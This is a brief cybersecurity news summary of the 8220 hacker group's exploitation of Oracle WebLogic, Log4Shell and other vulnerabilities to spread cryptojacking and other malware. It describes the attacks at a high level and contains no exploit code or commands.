Key Points:
- The 8220 hacker group, originally identified by Cisco Talos in 2017, is exploiting Windows and Linux web servers using crypto-jacking malware.
- Recently, the group targeted the Oracle WebLogic vulnerability (CVE-2017-3506) and Log4Shell (CVE-2021-44228), continuing their history of exploiting vulnerabilities such as Confluence, Log4j, Drupal, Hadoop YARN, and Apache Struts2 applications.
- The group was also found to be taking advantage of a Remote code execution vulnerability in Oracle WebLogic Server, CVE-2020-14883, and an authentication bypass vulnerability, CVE-2020-14882. Both methods have been made public and are relatively easy to modify for malicious intentions.
The 8220 hacker group utilizes two separate exploit chains for their attacks, one leveraging an XML file for further execution of commands on the operating system. The other method executes Java code without the use of an XML file. The first chain targets different XML files depending on the operating system in question. For Linux specifically, the group downloads other files through cURL, wget, lwp-download, and python urllib.
Following the download and execution process, compromised hosts are infected with AgentTesla, rhajk, and nasqa malware variants. Imperva has published a detailed report offering further insight into the exploitation methods, commands utilized, and encoding information among other details.
The increasing sophistication and reach of hacker groups like 8220 underscore the necessity for robust cyber security measures, especially for Windows and Linux web servers which appear to be prime targets.